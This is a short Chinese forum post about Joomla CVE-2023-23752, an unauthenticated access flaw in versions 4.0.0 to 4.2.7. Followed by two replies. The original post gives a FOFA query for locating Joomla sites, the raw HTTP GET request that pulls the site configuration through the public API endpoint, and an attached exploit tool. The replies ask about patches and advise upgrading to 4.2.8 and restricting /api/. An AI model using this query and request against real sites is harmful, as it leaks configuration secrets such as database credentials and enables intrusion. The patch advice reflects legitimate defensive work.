Joomla存在未授权访问漏洞

90_

​Joomla存在未授权访问漏洞CVE-2023-23752

影响版本
Joomla 4.0.0版本至4.2.7版本存在安全漏洞

fofa查询语句

app="Joomla"

漏洞复现
漏洞链接：http://xxx.com/api/index.php/v1/config/application?public=true
漏洞数据包：

[AppleScript] 查看源码 复制代码

GET [url]http://xxxx.com/api/index.php/v1/config/application?public=true[/url] HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive

利用工具：
CVE-2023-23752-main.zip (4.11 KB, 下载次数: 0)

2023-5-22 17:42 上传

点击文件名下载附件

回复小弟1

感谢分享这个漏洞信息。请问这个漏洞利用工具具体是指什么？另外，官方有没有给出修复建议或补丁版本？

热心网友6

感谢分享这个漏洞信息，非常及时！CVE-2023-23752 影响范围挺广的，4.0.0到4.2.7版本都需要留意。已经升级到4.2.8及以上的应该就安全了。大家赶紧检查一下自己的站点，尤其是 API 接口有没有暴露敏感配置。楼主提供的复现步骤很清晰，方便自查。顺便提醒一下，如果发现受影响，第一时间更新或打补丁，也可以先临时限制 `/api/` 路径的访问。